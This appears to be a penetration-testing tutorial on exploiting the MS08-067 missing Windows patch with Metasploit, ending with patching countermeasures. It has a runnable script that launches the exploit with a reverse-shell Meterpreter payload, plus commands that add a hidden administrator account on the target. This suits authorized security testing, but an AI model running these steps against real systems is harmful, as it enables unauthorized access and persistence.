Hacks That Exploit Missed Patches
Poking and prodding Windows for missing patches that might eventually lead to useful information, perhaps even system access, is one thing. Stumbling across a vulnerability that hands you full system access, all within 10 minutes, is quite another.
The bulletin phrase “arbitrary code can be run on the system” is no longer an abstract warning. With a tool such as Metasploit, one missing patch on one system is all it takes to gain access and demonstrate how the rest of the network can be compromised from that foothold.
Before you go ’sploitin’ vulnerabilities with Metasploit, it’s very important to know that you’re venturing into sensitive territory. Not only can you gain full, unauthorized access to sensitive systems, but you can also leave the systems being tested hung or rebooting; picking the wrong target version for a memory-corruption exploit typically crashes the service instead of opening a shell. So read each exploit’s documentation, try it against a non-production copy or snapshot where you can, and proceed with caution.
Before you can exploit a missing patch or related vulnerability, you have to find out what’s available to exploit. The quickest way is a vulnerability scanner such as QualysGuard or LanGuard, which reports missing patches by Microsoft bulletin ID (MS08-067, for example), the same identifier you’ll search for in Metasploit.
After you find a vulnerability, the next step is to exploit it. Here’s how:
Download and install Metasploit from www.metasploit.com/download.
After the installation is complete, run the Metasploit GUI (MSFGUI). The same modules are available from the msfconsole command line, and there’s also a web-based interface that you can reach through your browser.
Expand the Exploits option to see what exploits are available to run.
If you know the specific vulnerability (say, Microsoft’s MS08-067), you can simply enter part or all of the search term (such as ms08) in the search field at the top and then click Find.
After you find the exploit you want to run against your target system, double-click it and work through the wizard, starting with the target operating system; click the Forward button.
Select Automatic Targeting if it’s available; otherwise, make your best guess of which version of Windows is running (your scanner’s OS fingerprint helps here) and then click the Forward button.
Select the payload, the code that runs on the target once the exploit succeeds (a command shell or a Meterpreter session, for example), and then click the Forward button.
Enter the IP address of the target system in the RHOST field and confirm that the IP address shown in the LHOST field is the address of your testing system. For a reverse-connect payload the target has to be able to reach that address, so pick the interface that faces the target. Click the Forward button.
Confirm your settings on the final screen, and click the Apply button.
The job executes, and you see the shell session in the Sessions section in the lower-right quadrant of the Metasploit GUI.
Double-click the session and a new window opens with a command prompt on the target system.
To add a user, enter net user username password /add at the command prompt of that session. The command runs on the target, not on your testing system.
Next, add the user to the local Administrators group by entering net localgroup administrators username /add at the same prompt. You can then log in to the remote system by mapping a drive to the C$ share or by connecting via Remote Desktop. Remove the account (net user username /delete) when the test is over; a leftover administrator account is a finding in its own right.
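The same procedure driven from the msfconsole command line instead of the GUI, as an added example that is not part of the original text: a small bash script that writes a Metasploit resource script for the MS08-067 module and runs it. The addresses 10.0.0.5 (target) and 10.0.0.2 (testing system) are assumed lab values, and the script only launches msfconsole when it is installed and you are at an interactive terminal, since you need the prompt afterwards to reach the session.

```shell
#!/bin/sh
# Added example (not from the original text): MS08-067 via a msfconsole
# resource script. Usage: ./ms08_067.sh <target ip> <your ip>
# The default addresses below are assumed lab values.
set -eu

RHOST="${1:-10.0.0.5}"   # target system (the GUI's RHOST field)
LHOST="${2:-10.0.0.2}"   # testing system the reverse payload calls back to (LHOST)

# Emit the resource-script equivalent of the GUI wizard: choose the module,
# the addresses, the payload and automatic targeting, check, then exploit.
# Current Metasploit spells the target option RHOSTS; older releases use RHOST.
build_rc() {
  rhost="$1"
  lhost="$2"
  cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS ${rhost}
set LHOST ${lhost}
set PAYLOAD windows/meterpreter/reverse_tcp
set TARGET 0
check
exploit -z
EOF
}

main() {
  rc="$(mktemp /tmp/ms08_067.XXXXXX)"
  build_rc "$RHOST" "$LHOST" > "$rc"
  if command -v msfconsole >/dev/null 2>&1 && [ -t 0 ]; then
    # -q suppresses the banner; -r runs the resource script and then leaves
    # you at the prompt, where 'sessions -l' and 'sessions -i 1' reach the shell.
    msfconsole -q -r "$rc"
  else
    echo "msfconsole not available here; resource script written to ${rc}" >&2
  fi
}

main
```

TARGET 0 is the module’s Automatic Targeting entry, and the check command asks the module whether the host looks unpatched before anything is thrown; exploit -z runs the exploit without dropping you into the session, so the console returns to the prompt once the script finishes. Inside a Meterpreter session, the shell command gives you the target’s command prompt, which is where the net user commands above go. The same script, with the exploit line removed, is a quick way to confirm after patching that the fix actually took.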
Three editions of Metasploit are available from Rapid7. The free edition used in the preceding steps is Metasploit Community. It may be all you need if an occasional screenshot of remote access or similar is sufficient for your testing purposes.
There’s also Metasploit Express, which adds features such as password auditing and evidence collection. Finally, there’s a full-blown commercial version called Metasploit Pro for the serious security professional. Metasploit Pro adds features for social engineering, web application scanning, and detailed reporting.
Note the workflow features in the tabs across the top, including Analysis, Sessions, Campaigns, Web Apps, and Reports. It’s a well-thought-out interface that takes the pain out of traditional security scanning, exploitation, and reporting, which is especially useful for the less technical IT professional.
Metasploit Pro lets you import scanner findings (typically XML files) from third-party vulnerability scanners such as Acunetix Web Vulnerability Scanner, Nmap, and QualysGuard. Simply click the Analysis tab and select Import.
After the scan data is imported, you can click Vulnerabilities (under Analysis) and see all the original vulnerability scanner findings. To exploit one of the vulnerabilities (Metasploit has to have a matching exploit module), click the finding under the Name column and you’ll be presented with a new page that allows you to exploit the flaw.
Numerous resources are available at www.metasploit.com/help. Metasploit is powerful on its own; combine it with the exploit code continually added to Offensive Security’s Exploit Database, and you have practically everything you need if you choose to drill down to that level of exploitation.
Countermeasures against missing patch vulnerability exploits
Patch your systems, both the Windows OS and any Microsoft or third-party applications running on them, and then verify that the patches actually applied; a failed install or a missed reboot leaves the hole open even though the console says otherwise. That really is all there is to it, but it has to be done everywhere: one unpatched host is all Metasploit needs.
To get your arms around the patching process, automate it wherever you can. Use Windows Update or, better yet, Windows Server Update Services (WSUS) for Microsoft patches; see http://technet.microsoft.com/en-us/wsus/default.aspx. WSUS handles Microsoft updates only, so for third-party applications, or if you’re looking for a commercial alternative, check out GFI LanGuard’s patch management features and Lumension Patch and Remediation.